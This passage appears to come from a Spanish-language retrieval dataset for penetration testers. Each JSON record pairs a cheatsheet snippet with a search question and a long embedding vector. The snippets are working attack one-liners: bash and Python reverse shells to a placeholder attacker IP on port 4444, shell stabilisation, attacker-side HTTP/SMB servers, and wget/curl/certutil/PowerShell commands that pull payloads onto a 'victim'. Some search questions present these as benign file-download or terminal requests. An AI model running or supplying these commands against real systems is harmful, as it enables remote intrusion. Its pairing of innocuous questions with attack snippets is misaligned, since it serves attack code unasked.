0.03069, 0.08439, 0.08238, 0.01586, 0.01571, -0.02525, 0.07273, 0.02518, -0.01769, -0.02531, 0.06675, 0.05053, -0.04328, 0.02457, 0.05927, -0.00511, 0.06438, 0.05439, -0.05384, -0.01585, -0.00901, -0.09495, 0.00041, 0.00037, -0.02159, -0.01226, 0.04332, 0.02383, 0.11234, -0.01607, 0.01259, 0.01807, -0.00172, -0.01329, 0.03767, -0.02776, 0.00315, -0.00265, 0.04436, -0.02001, -0.05754, 0.02913, -0.02743, -0.02537, -0.00298, -0.0014, 0.01664, 0.03803, 0.01173, -0.06034, 0.01279, -0.05188, -0.04753, 0.02661, 0.02149, -0.02609, 0.02642, -0.00081, -0.03222, 0.01931, -0.00597, -0.01087, -0.01035, -0.02727, -0.00441, -0.01622, 0.00316, 0.01143, -0.01831, -0.04191, -0.04788]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Disparo (Linux)\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nsh -i >& /dev/tcp/TU_IP/4444 0>&1\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", "indexar": "cual es una alternativa libre a scripts de reverse shell", "v": [0.08928, -0.02358, -0.0499, -0.02641, -0.07397, -0.14429, -0.17058, -0.12016, 0.01823, 0.01785, -0.0874, -0.14109, -0.01656, -0.07612, 0.11516, -0.01735, -0.06591, -0.11221, 0.10897, -0.01061, -0.03879, -0.03336, -0.045, -0.07628, -0.07323, -0.04027, 0.01209, 0.11731, -0.09603, -0.07092, -0.05195, -0.058, 0.08619, -0.05098, -0.04621, 0.1003, 0.11161, 0.03728, 0.11256, 0.09361, 0.0288, -0.06028, -0.08077, 0.16221, 0.01984, -0.10818, -0.0004, 0.0182, -0.00571, -0.00571, -0.03633, -0.05973, -0.14511, 0.07665, 0.09288, 0.04327, 0.12526, -0.19271, -0.0673, 0.00537, -0.10138, 0.03377, 0.03031, -0.01145, 0.09743, 0.01921, -0.054, -0.11023, -0.10424, 0.04187, 0.05635, 0.02048, -0.02315, 0.00832, -0.11357, 0.04168, -0.08361, -0.05193, -0.07295, 0.04615, -0.06575, -0.12608, 0.01023, 0.09602, 0.00732, -0.12943, -0.06424, -0.07091, -0.04121, 0.04948, 0.09644, 0.04232, 0.0069, 0.10853, -0.01364, -0.13869, -0.00305, 0.08095, -0.03074, 0.07258, -0.04155, -0.00926, -0.02146, 0.07687, 0.05458, 0.04276, -0.044, 0.05588, -0.03556, 0.102, 0.01027, 0.03692, 0.05938, 0.09883, 0.04951, -0.03755, -0.0314, 0.02502, 0.06999, -0.02958, -0.01296, 0.00497, -0.09754, -0.06882, -0.00257, 0.04055, 0.03034, 0.00596, -0.05671, 0.04792, -0.02233, -0.03391, -0.09517, -0.08866, -0.13408, 0.07309, 0.14524, 0.03905, -0.00858, -0.02143, 0.0239, 0.0626, 0.04294, 0.04479, 0.03601, -0.10403, 0.00421, -0.08519, -0.03084, -0.0484, -0.05556, 0.05757, -0.00828, 0.08968, -0.03325, -0.07881, -0.01909, 0.0011, -0.08435, 0.03073, 0.00416, -0.03576, -0.03425, 0.06401, 0.02691, -0.04125, -0.05975, 0.01831, -0.04307, 0.02276, -0.0082, 0.06377, 0.13135, -0.0418, 0.04906, -0.05273, 0.01588, -0.07136, -0.03493, -0.0616, 0.08454, -0.00507, -0.06047, -0.02824, -0.00754, -0.03914, 0.00755, 0.05626, 0.02213, 0.02981, -0.01613, 0.04145, -0.07308, -0.09986, -0.03624, 0.05567, 0.0194, -0.10275, 0.00551, 0.01856, -0.05627, 0.06522, 0.04507, -0.05503, -0.01126, 0.00454, -0.05132, 0.00141, -0.01752, -0.01361, 0.03801, 0.03887, 0.03998, 0.1163, -0.01609, -0.01496, 0.02912, 0.01244, -0.00276, -0.01091, 0.04277, -0.03219, -0.00861, -0.01203, -0.03816, -0.03683, 0.05195, 0.0359, -0.04512, 0.00777, 0.0193, 0.00181, -0.02073, 0.05184, -0.01984, -0.00988, -0.02994, 0.00312, 0.03447, -0.02158, 0.00788, 0.0735, -0.0181, -0.06582, -0.00941, 0.01834, -0.04998, -0.04973, -0.00295, 0.02561, -0.03088, 0.0375, 0.00745, 0.00751, 0.00376, -0.01603]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Estabilizar la TTY tras coger la shell\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'", "indexar": "quΓ© programa sirve para iniciar una nueva consola de bash en un servidor Linux?", "v": [-0.08784, 0.00776, -0.18657, -0.16285, -0.05163, -0.2814, -0.12109, -0.16142, -0.01999, -0.01312, -0.0942, -0.05648, 0.07202, -0.07749, -0.0149, -0.02493, 0.0319, -0.11518, 0.04989, 0.02386, -0.02458, 0.12869, -0.04316, -0.04632, 0.05755, -0.00148, 0.07635, -0.08819, -0.00397, 0.01289, -0.12263, -0.10671, 0.07868, 0.02092, 0.0195, -0.00183, -0.03742, 0.04195, 0.03568, 0.08609, 0.10064, 0.00279, -0.01592, 0.05076, 0.03684, -0.16913, 0.10938, -0.04677, 0.10619, -0.11067, 0.0079, -0.04746, -0.04756, 0.03111, 0.0831, 0.01392, 0.02848, -0.18274, 0.04692, 0.00039, -0.19661, -0.02443, 0.00979, -0.04446, 0.03615, 0.03573, -0.09467, -0.11144, -0.06275, 0.01196, -0.08662, 0.06559, 0.00366, -0.05941, -0.01798, 0.04537, -0.12865, -0.02673, 0.08108, -0.0029, 0.02256, -0.04381, 0.00217, 0.11081, -0.04654, -0.12779, 0.01167, 0.02533, 0.00809, 0.0223, 0.05498, 0.0539, -0.0165, 0.12306, 0.13204, 0.01295, 0.1698, 0.01628, 0.02076, -0.00838, 0.01398, 0.01431, -0.09178, 0.12711, -0.04374, 0.03117, 0.0734, -0.05922, 0.00668, 0.0066, 0.07138, 0.01765, 0.00123, 0.00783, -0.10613, -0.03855, -0.08193, 0.01614, 0.0408, 0.04972, -0.05721, 0.02607, 0.01462, 0.0289, 0.00241, -0.05205, -0.01568, 0.10909, -0.02551, -0.00279, 0.04798, -0.11643, 0.02311, 0.04263, -0.06651, 0.01478, 0.03003, -0.04948, -0.05496, -0.05384, 0.05557, 0.11807, 0.00615, -0.00115, 0.1277, -0.01076, 0.12525, -0.078, -0.01419, -0.00509, 0.02473, -0.00058, 0.0023, -0.02327, -0.09964, -0.00216, 0.03076, 0.00022, -0.07905, 0.01776, 0.01556, -0.00796, -0.03008, 0.01998, -0.01027, -0.01804, -0.04742, 0.08528, 0.06344, 0.10482, -0.01572, 0.03839, 0.01275, -0.02692, 0.018, -0.03054, -0.00022, -0.04372, 0.01199, -0.00451, -0.04428, 0.04268, 0.00948, -0.0151, -0.03403, -0.02454, -0.07406, -0.00582, -0.00812, -0.03065, 0.03988, 0.03893, -0.0494, -0.03004, 0.01052, 0.00048, -0.04055, -0.05181, -0.03119, 0.01257, -0.03685, 0.05378, -0.03997, -0.0448, 0.03082, 0.01122, -0.04743, -0.00251, 0.00019, 0.02525, -0.01633, 0.04562, 0.06957, 0.05383, 0.01979, -0.05153, 0.08174, 0.01937, 0.07893, -0.00236, -0.0099, -0.01194, 0.0039, -0.02338, -0.04356, -0.05942, 0.01382, -0.02132, 0.04096, -0.04406, 0.02091, -0.03429, -0.00429, -0.01184, -0.01648, -0.0196, 0.037, -0.02909, -0.00762, -0.04686, -0.03139, 0.05991, -0.01503, -0.10085, -0.02388, -0.07621, 0.0027, -0.02143, -0.04741, -0.01644, -0.02791, -0.02068, 0.04448, -0.02467, -0.04798, 0.05627]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Estabilizar la TTY tras coger la shell\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'", "indexar": "cΓ³mo puedo acceder a una terminal interactiva sin abrir el shell directamente?", "v": [-0.04185, 0.11851, -0.18135, -0.10591, 0.07157, -0.12013, -0.11198, 0.01475, -0.03744, 0.03361, -0.15073, -0.04885, 0.01951, -0.06277, 0.11308, 0.02307, -0.03495, -0.06324, 0.07381, -0.06287, 0.01421, 0.10343, -0.13938, -0.058, 0.05048, -0.00436, -0.047, -0.02347, -0.00722, -0.14446, -0.01605, -0.17439, 0.15629, 0.0096, -0.04353, -0.02247, 0.08866, 0.02844, 0.08025, 0.00532, -0.04059, 0.00915, -0.1166, 0.17556, 0.1646, -0.04371, 0.0631, -0.02933, -0.00812, 0.02713, -0.02405, -0.04071, -0.1693, 0.00452, -0.00792, 0.02892, 0.14493, -0.12989, 0.11475, -0.03304, -0.02211, 0.08766, 0.06592, 0.08356, 0.04331, -0.05344, 0.02174, 0.02931, -0.09985, 0.14546, -0.04704, 0.00336, -0.0025, 0.1197, -0.01029, 0.06622, -0.07932, 0.00272, 0.1342, 0.11151, 0.01017, 0.00357, 0.12766, -0.01394, -0.03452, -0.08025, -0.03466, -0.01383, 0.01053, -0.06182, 0.11031, 0.01677, -0.0035, 0.08117, -0.05795, -0.11675, -0.12804, -0.02383, -0.06778, -0.03731, 0.00186, 0.03362, -0.08154, 0.12554, 0.02341, -0.03664, -0.00668, -0.06353, -0.01358, 0.00025, 0.07786, -0.06057, 0.04467, -0.04778, -0.05959, 0.02474, -0.09601, -0.00346, -0.04799, -0.03383, -0.09159, -0.09508, -0.02813, 0.00155, -0.00256, -0.02378, -0.00957, 0.06689, 0.02599, 0.01239, -0.03836, -0.04293, 0.06601, -0.0055, 0.00767, -0.07444, -0.00508, -0.09315, 0.00582, -0.03769, 0.0254, 0.01624, 0.00929, -0.0493, -0.01724, 0.00174, -0.03255, -0.0007, -0.09086, -0.02885, 0.00142, -0.06013, -0.01882, 0.02446, -0.01698, 0.0094, 0.07239, 0.03042, -0.04181, 0.06235, -0.05214, -0.04567, -0.11972, 0.01352, -0.05586, -0.01933, -0.16203, -0.04379, 0.04479, -0.02021, 0.01967, 0.09067, 0.0639, 0.02474, 0.01099, 0.0153, -0.02817, -0.02277, 0.05356, -0.06293, -0.00453, -0.03381, -0.01163, -0.06092, -0.09676, -0.06061, 0.03776, -0.06687, -0.06162, 0.08831, 0.0362, 0.04802, -0.00715, 0.03356, 0.06907, -0.00634, 0.03871, 0.01672, -0.04321, 0.00632, -0.01719, 0.04571, 0.04114, -0.05438, 0.05548, 0.03761, -0.06895, 0.01335, 0.01411, 0.01099, 0.00527, 0.01173, 0.06677, 0.03403, 0.06335, -0.01017, -0.06496, -0.00148, 0.00283, 0.0569, -0.00855, 0.0269, 0.04639, 0.0196, 0.0444, -0.00463, 0.01537, 0.02756, 0.02412, -0.00831, -0.02629, 0.01828, 0.02845, 0.04914, 0.00719, -0.04949, 0.00892, 0.02027, -0.00158, 0.0119, 0.03414, 0.11739, 0.01162, -0.00879, -0.01064, -0.03066, -0.02632, -0.01166, -0.03971, -0.03744, -0.11748, -0.02654, 0.02887, 0.00033, -0.02002, -0.01811]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Estabilizar la TTY tras coger la shell\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'", "indexar": "existe alguna herramienta para levantar una sesiΓ³n TTY limpia desde la lΓ­nea de comandos?", "v": [-0.05984, 0.13695, -0.26615, -0.0798, 0.0167, -0.1938, -0.16768, 0.05694, -0.05323, 0.02147, -0.20073, -0.03199, 0.13126, -0.00418, 0.12902, 0.02972, 0.04179, -0.05647, 0.02554, -0.06208, -0.00438, 0.04049, -0.08343, -0.05579, 0.00011, -0.01007, 0.15892, -0.12595, -0.15995, 0.0375, -0.00436, 0.02456, 0.04982, -0.00205, -0.0568, -0.01202, -0.09661, 0.06229, -0.04239, 0.09458, -0.06721, 0.07266, -0.11543, 0.10131, 0.0268, -0.00791, 0.09347, 0.04954, 0.03083, 0.04094, -0.04378, -0.0744, -0.04722, -0.03413, -0.08919, -0.09107, 0.17977, -0.0195, 0.08285, -0.02373, -0.07902, -0.08412, 0.00432, 0.05054, 0.02411, 0.00545, -0.00929, -0.16231, -0.02903, 0.10393, -0.05502, 0.01403, 0.0227, 0.0328, 0.08892, -0.09241, 0.00458, -0.01043, 0.07316, -0.00492, -0.00942, -0.02877, -0.06516, -0.00841, -0.17094, -0.17251, -0.02829, 0.04826, -0.01553, -0.01145, -0.02976, 0.0496, -0.01204, -0.06582, 0.02358, 0.04711, 0.00605, 0.03088, 0.05935, 0.02811, 0.10592, -0.03675, -0.06073, 0.0952, -0.02056, -0.04449, -0.06212, -0.0348, -0.04605, 0.0064, 0.05174, -0.08353, 0.00496, -0.03888, -0.06147, -0.00554, -0.01908, -0.06933, -0.03666, -0.04471, -0.01558, -0.00916, -0.00146, 0.04123, -0.0159, -0.04961, -0.01395, 0.07067, 0.00501, -0.03465, -0.01984, 0.07661, -0.0004, -0.05798, -0.05098, 0.02753, 0.02923, -0.09822, -0.05041, -0.15113, 0.02252, 0.15752, -0.06419, -0.00078, 0.03836, -0.03013, 0.03072, -0.10701, -0.09183, 0.01011, 0.1304, -0.00696, -0.0549, 0.04201, 0.04624, 0.04201, -0.00627, -0.00911, -0.07946, 0.00493, -0.05676, -0.1328, 0.01042, -0.03811, 0.01661, -0.02016, -0.04849, 0.07302, -0.01914, 0.02098, 0.03619, 0.02764, 0.04308, -0.06605, -0.00369, -0.06716, -0.03766, 0.01086, 0.0387, -0.04368, -0.01708, 0.01137, -0.01845, -0.09312, -0.03146, -0.02233, 0.02156, -0.01615, -0.01421, -0.01043, 0.03098, 0.03763, -0.07311, -0.07672, 0.00174, 0.01625, 0.03085, -0.06659, 0.02943, 0.0073, -0.12265, -0.00522, 0.03484, -0.02915, 0.02323, 0.01972, 0.01936, 0.0189, 0.03941, -0.01054, 0.04205, 0.01089, 0.02808, -0.04619, -0.02875, -0.00341, -0.02148, -0.03593, -0.0318, -0.01717, 0.00365, -0.00891, 0.02706, 0.01811, 0.0096, 0.04877, -0.01349, 0.01451, 0.03552, 0.05126, 0.03475, -0.00547, -0.00523, -0.05238, 0.01098, 0.0225, 0.0279, -0.01624, -0.02513, -0.00092, -0.02203, 0.01459, 0.00734, -0.07239, 0.0456, -0.07523, -0.02041, -0.02201, -0.04062, -0.04392, -0.03226, -0.00967, 0.0483, -0.03893, 0.00252, -0.02009]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Servir desde el atacante\npython3 -m http.server 80\nimpacket-smbserver share $(pwd) -smb2support # SMB", "indexar": "que programa sirve para servir archivos HTTP con python?", "v": [0.0453, -0.10456, -0.09014, -0.22423, 0.04339, -0.2426, 0.00266, -0.10246, 0.06047, 0.03862, -0.09593, 0.02521, 0.05914, -0.03885, -0.0384, -0.00606, 0.08657, -0.09341, 0.15858, -0.01705, -0.05078, 0.10805, -0.06434, -0.07369, -0.04184, -0.01748, 0.07349, 0.09212, -0.16203, -0.03488, 0.0471, -0.00226, -0.04605, 0.08003, -0.09645, 0.01317, 0.01525, 0.13993, -0.09816, 0.13353, -0.05144, -0.00464, -0.00298, 0.0819, -0.12067, -0.00122, 0.07204, -0.05325, 0.03621, -0.06302, -0.00869, -0.05373, -0.10578, 0.07359, -0.03833, 0.07649, -0.02845, -0.17798, -0.005, -0.00966, -0.08671, -0.0749, 0.01842, -0.03451, 0.02548, -0.02462, 3e-05, 0.00677, -0.17805, 0.09557, -0.07348, 0.10542, 0.06405, -0.03383, 0.02022, 0.01683, -0.11466, -0.06543, -0.06248, 0.02785, 0.03273, -0.05519, -0.02998, 0.0555, -0.07884, -0.07821, 0.01874, 0.01374, 0.10738, -0.04873, 0.09555, 0.15629, -0.0168, 0.02369, 0.01034, -0.03839, 0.11009, -0.05875, 0.06617, 0.02287, 0.02284, -0.03886, -0.00982, 0.09983, 0.03037, 0.15486, 0.05879, 0.04846, -0.07911, -0.07144, 0.08204, -0.00954, -0.07887, 0.02673, -0.08573, -0.07364, -0.02398, 0.03997, 0.029, -0.02705, -0.07167, 0.03145, -0.09953, 0.08822, 0.02123, 0.04813, 0.03702, 0.1202, -0.06726, 0.0734, 0.0191, -0.0006, -0.04403, 0.06054, -0.08017, -0.00155, 0.10603, -0.03395, 0.00659, -0.00467, 0.00493, 0.05297, -0.01165, 0.03534, 0.07693, 0.01798, 0.06412, -0.03936, -0.02569, -0.05596, 0.02776, -0.00338, -0.01915, -0.00063, -0.1176, -0.01975, -0.04734, -0.07501, -0.07074, 0.02554, 0.0174, -0.00293, 0.00099, -0.01633, 0.04506, -0.00501, -0.045, 0.03096, 0.13552, 0.00481, 0.0277, 0.05963, -0.00096, -0.11799, -0.05181, -0.01135, -0.03427, -0.03216, 0.0194, -0.00614, -0.01045, -0.03916, 0.00691, 0.04809, 0.02246, -0.03017, 0.04282, 0.01816, -0.03757, -0.0037, -0.02228, 0.01281, -0.10465, 0.0407, 0.00654, 6e-05, -0.04462, 0.03594, 0.06727, -0.02462, -0.00868, -0.03538, 0.00157, 0.02304, 0.01524, 0.0809, 0.00914, -0.0297, 0.02156, 0.01616, 0.00284, -0.0452, 0.08117, 0.01449, 0.01807, -0.03752, 0.02509, 0.07005, 0.04663, 0.03318, -0.04702, -0.02463, 0.01014, 0.04762, 0.03425, -0.01445, 0.05346, -0.0705, 0.03144, -0.04842, -0.06821, -0.02948, -0.04658, 0.02279, 0.03317, -0.03224, -0.03178, -0.00401, -0.03683, -0.06437, -0.04935, 0.05185, -0.029, -0.04676, 0.00277, 0.00334, -0.02541, -0.02806, 0.00335, 0.0309, -0.04915, -0.00106, -0.00334, -0.01365, -0.0032, 0.06064]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Servir desde el atacante\npython3 -m http.server 80\nimpacket-smbserver share $(pwd) -smb2support # SMB", "indexar": "con que puedo montar un servidor SMB compartido usando impacket?", "v": [0.01068, -0.00251, -0.27299, -0.14377, -0.20867, -0.11485, -0.02003, -0.08541, -0.05158, -0.09525, -0.14869, 0.10685, 0.14585, -0.09583, -0.06, 0.1525, 0.07705, -0.12227, 0.00475, 0.02407, 0.11566, 0.04404, 0.07071, -0.06618, 0.03259, 0.11916, 0.04424, -0.02071, -0.09616, -0.0003, 0.00708, 0.01448, 0.03085, 0.0179, 0.00429, -0.19908, -0.00095, 0.03368, 0.02336, -0.01004, 0.05985, -0.00261, -0.10683, -0.00321, -0.01868, 0.03507, 0.01604, -0.0842, -0.00265, -0.0288, 0.0057, -0.05837, -0.16472, 0.03066, -0.10858, -0.00287, 0.1475, -0.11271, 0.08277, 0.04728, -0.06305, 0.10729, 0.01275, 0.06062, 0.13209, -0.05785, -0.07965, 0.0386, -0.11269, -0.07743, -0.0734, 0.02432, 0.02952, -0.07287, 0.03698, 0.13848, 0.01929, -0.01181, 0.07896, 0.11034, 0.00361, -0.01115, 0.00123, 0.12992, -0.07975, -0.06454, 0.01078, -0.0333, 0.08875, 0.01113, 0.0247, 0.06591, -0.04241, 0.0502, 0.00324, -0.0785, 0.11318, 0.04249, 0.0507, -0.0108, 0.05851, 0.09595, -0.01783, 0.08447, 0.03842, 0.05592, 0.08785, -0.07195, 0.07041, 0.00738, 0.11175, 0.02075, -0.03151, 0.02245, -0.05343, -0.12761, 0.01429, 0.00113, 0.02749, 0.01516, -0.03433, 0.05532, 0.04027, 0.03256, 0.02392, -0.08025, 0.13647, 0.06009, -0.02283, -0.04632, -0.06296, 0.00856, -0.00362, -0.00375, -0.00025, -0.00373, 0.04402, -0.05573, -0.08027, -0.01649, 0.03277, -0.01339, -0.05801, 0.01919, 0.02803, 0.03293, 0.0467, -0.09164, -0.0444, 0.00914, 0.12701, 0.04098, -0.0354, -0.00179, -0.06766, -0.00702, 0.04918, -0.09671, -0.04133, 0.04893, 0.02284, 0.05445, -0.0077, 0.10908, 0.01653, -0.0018, -0.01056, 0.02417, 0.04979, 0.04912, -0.05064, 0.0453, 0.02108, -0.00186, 0.02255, -0.01641, -0.081, -0.02954, 0.03049, 0.00985, -0.01057, -0.00427, -0.02445, 0.04176, -0.07244, -0.05025, 0.01246, 0.01182, -0.02008, -0.01281, 0.02911, 0.02924, 0.03223, 0.04341, 0.04538, -0.0807, 0.01002, -0.0169, 0.00763, -0.00194, -0.02972, -0.00136, -0.07657, -0.04265, -0.0075, -0.05102, -0.04841, 0.08596, 0.05313, 0.02271, 0.00376, -0.03101, 0.04619, -0.08136, -0.02675, 0.02415, 0.04554, -0.00771, -0.01717, -0.03067, -0.00248, 0.02499, 0.03626, -0.0026, 0.04091, 0.02036, -0.02156, -0.01578, 0.05933, -0.00158, -0.02722, 0.06025, -0.0265, 0.00116, 0.02568, 0.01019, 0.01502, 0.01576, -0.01828, -0.00857, -0.02093, 0.0299, -0.03102, -0.03396, -0.02426, -0.01933, -0.02815, 0.00485, -0.04849, -0.04042, 0.02915, -0.04717, -0.00855, -0.03938, -0.05274, 0.02003]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Servir desde el atacante\npython3 -m http.server 80\nimpacket-smbserver share $(pwd) -smb2support # SMB", "indexar": "cual es una alternativa libre a los servidores de archivo preconfigurados?", "v": [-0.07043, -0.04731, 0.01455, -0.16335, 0.04335, -0.08673, 0.09225, -0.06892, -0.12713, -0.03867, -0.13551, -0.16053, -0.02906, -0.04214, 0.07733, -0.0476, 0.12914, -0.03225, 0.12007, 0.03876, 0.003, 0.03029, -0.02205, 0.02459, -0.04785, -0.05896, 0.07904, 0.04504, -0.12664, -0.04191, 0.05025, -0.01608, 0.06804, 0.02178, -0.02401, 0.03805, 0.05665, 0.1352, -0.11323, 0.03978, 0.06555, -0.02104, -0.1289, 0.06288, 0.01814, -0.14397, -0.01278, 0.00691, 0.06445, -0.01111, -0.05125, -0.09288, -0.00701, -0.01923, 0.00239, -0.00418, 0.14899, -0.18287, 0.01807, 0.02211, -0.17844, 0.11469, 0.00203, 0.04081, 0.0273, 0.0327, -0.05819, 0.02373, -0.12508, 0.0002, -0.02753, 0.06284, -0.05427, -0.10061, -0.09086, 0.10188, -0.09541, -0.08776, 0.07327, 0.0903, 0.03072, 0.01166, -0.00018, 0.05463, -0.17583, -0.11916, -0.02594, -0.01045, -0.00843, -0.03145, 0.13195, 0.01366, -0.05537, 0.1594, 0.09258, -0.08061, 0.0903, 0.04604, 0.05058, 0.02043, 0.06199, 0.10416, -0.04264, 0.06995, 0.02662, 0.06673, 0.04283, -0.00612, -0.02002, -0.05883, 0.04307, 0.0036, 0.09445, 0.0896, -0.00169, -0.13476, 0.01405, 0.02683, 0.01251, 0.03819, -0.08138, -0.0182, 0.03079, 0.04701, -0.00163, -0.02307, 0.03051, 0.02648, -0.01558, -0.00894, 0.02429, -0.04844, -0.09693, -0.04384, -0.09981, -0.05701, 0.11862, -0.02413, -0.03246, -0.0598, 0.07825, 0.04692, 0.00328, 0.03006, 0.14285, -0.03434, -0.00533, -0.02182, -0.05254, -0.06314, -0.04294, 0.00277, -0.02009, 0.03581, -0.12151, 0.0421, 0.00105, -0.05362, -0.0772, 0.02716, 0.02755, 0.02367, -0.0088, 0.06593, -0.01491, -0.03925, -0.04117, 0.01681, 0.0288, -0.01986, 0.03326, 0.02115, 0.00025, -0.11575, 8e-05, -0.0706, -0.07392, -0.08043, 0.10205, 0.02024, 0.00901, 0.04131, -0.03621, 0.05269, -0.06476, -0.05045, -0.00045, -0.04108, -0.014, -0.01507, -0.00626, 0.02873, -0.05766, -0.02133, 0.03525, -0.01636, -0.05276, -0.03103, -0.05124, -0.01461, -0.00556, -0.01957, -0.03615, -0.01931, 0.00833, -0.01922, -0.0313, 0.0241, -0.00884, 0.05854, 0.03131, -0.006, 0.12289, -0.00448, -0.05413, -0.01031, 0.08184, -0.01316, 0.00528, -0.04562, 0.03108, 0.01888, 0.09503, -0.01412, -0.02062, 0.02833, 0.04719, 0.03519, -0.03001, -0.02672, 0.00924, 0.08491, -0.00915, 0.00072, 0.02293, -0.04237, 0.02602, 0.0114, -0.01739, -0.05432, 0.03947, 0.1004, -0.01604, -0.0448, -0.02845, -0.03776, -0.09378, 0.00493, -0.00277, -0.05891, -0.00085, 0.01246, 0.04725, -0.00717, -0.02143, -0.0246]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Recibir en la victima\nwget http://TU_IP/file -O /tmp/file\ncurl http://TU_IP/file -o /tmp/file\ncertutil -urlcache -f http://TU_IP/file file.exe # Windows\npowershell iwr http://TU_IP/file -OutFile file # Windows\n```", "indexar": "que programa o comando puedo usar para descargar un archivo desde una direcciΓ³n IP a mi ordenador?", "v": [-0.00907, 0.05124, -0.08255, -0.26068, 0.02224, -0.1706, 0.02297, 0.02179, -0.16212, -0.02392, -0.00839, -0.11458, -0.04061, -0.12203, -0.04781, -0.03901, 0.18891, -0.01337, 0.10203, -0.09734, 0.05112, 0.11636, -0.01686, -0.02565, -0.01284, 0.10055, -0.03215, 0.05247, -0.13717, -0.14444, -0.07241, -0.00948, 0.05333, -0.06547, -0.10299, -0.02377, 0.05354, 0.04081, 0.01744, 0.13013, 0.01705, 0.04225, -0.12786, 0.10237, 0.07491, -0.04928, 0.13561, -0.06444, 0.06358, -0.08565, -0.02487, -0.1543, 0.02019, 0.00208, -0.05723, -0.08122, 0.05848, -0.15419, 0.0191, -0.00057, -0.05515, 0.06174, -0.01621, 0.07513, -0.02818, -0.04609, -0.01681, -0.01851, -0.16565, -0.01607, -0.06286, 0.0858, -0.0408, 0.05393, 0.00481, 0.00396, -0.04278, -0.12226, 0.10714, -0.01021, 0.00952, 0.02542, -0.02587, 0.01959, -0.15198, -0.12868, 0.05276, -0.10876, 0.02678, -0.07529, 0.02753, 0.04649, -0.03797, 0.05875, 0.08328, -0.01978, 0.05845, 0.11084, 0.04296, 0.03556, 0.01518, 0.00184, -0.0652, 0.17974, 0.0773, 0.12139, 0.08017, -0.01156, 0.00438, 0.03944, -0.02771, -0.02831, 0.05589, -0.01616, -0.09122, -0.02564, 0.01258, -0.08102, -0.01751, -0.06587, -0.08771, 0.00781, 0.00189, 0.10084, 0.03378, -0.01873, -0.01538, 0.12357, -0.05793, -0.00648, -0.0181, -0.01317, -0.02577, -0.0623, -0.01487, 0.01871, -0.00054, -0.0193, -0.03556, -0.08846, 0.05062, 0.03854, -0.03023, 0.03316, 0.03735, -0.02405, -0.00563, -0.08771, -0.03162, -0.05445, 0.08221, 0.023, 0.00136, -0.00727, -0.02674, 0.07471, 0.05316, -0.03698, -0.04487, -0.00966, -0.08059, 0.02776, 0.01563, 0.00484, 0.03854, -0.05845, -0.05287, 0.018, 0.04849, 0.02907, -0.06107, 0.05085, -0.01357, -0.10695, -0.01598, -0.07157, 0.01623, -0.04875, 0.00429, 0.04155, -0.04288, 0.0643, 0.02429, 0.03561, -0.04787, -0.004, 0.02282, 0.04216, -0.02818, -0.00591, 0.00299, 0.05603, 0.00234, -0.00035, 0.03554, -0.01425, -0.04649, 0.02149, -0.00619, -0.01898, -0.08745, 0.00054, -0.0686, -0.00586, 0.07374, -0.00775, -0.02823, 0.00394, 0.00988, 0.02172, -0.0199, -0.02613, 0.04969, -0.02796, -0.05817, -0.04619, 0.03747, 0.04754, 0.0258, -0.00454, -0.00429, 0.01452, 0.0712, 0.01952, 0.02237, -0.0563, -0.02027, 0.00706, 0.00505, -0.00058, -0.01745, 0.04815, -0.0015, -0.03487, 0.03822, -0.03021, -0.00564, 0.02097, -0.01727, -0.02438, -0.02916, 0.09149, 0.00321, -0.08459, -0.06361, -0.01647, -0.08805, 0.02757, -0.00945, -0.05223, -0.05371, -0.00447, 0.00124, -0.02065, -0.04298, 0.0474]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Recibir en la victima\nwget http://TU_IP/file -O /tmp/file\ncurl http://TU_IP/file -o /tmp/file\ncertutil -urlcache -f http://TU_IP/file file.exe # Windows\npowershell iwr http://TU_IP/file -OutFile file # Windows\n```", "indexar": "con que herramienta puedo guardar un archivo en la carpeta de temporales?", "v": [0.16255, 0.00494, -0.10457, -0.12658, -0.10149, -0.06165, 0.0854, 0.09231, 0.05827, -0.02754, -0.11122, -0.00453, 0.01456, 0.10107, 0.04558, 0.17371, 0.1928, -0.08481, 0.07165, -0.03322, 0.03613, 0.05311, -0.0413, -0.01714, -0.1419, -0.04114, 0.07858, -0.0003, -0.21444, 0.05452, -0.03283, 0.10406, 0.10777, -0.07737, -0.07224, 0.01459, 0.00756, 0.05296, -0.19219, -0.02043, 0.05868, 0.11772, -0.10052, 0.07479, 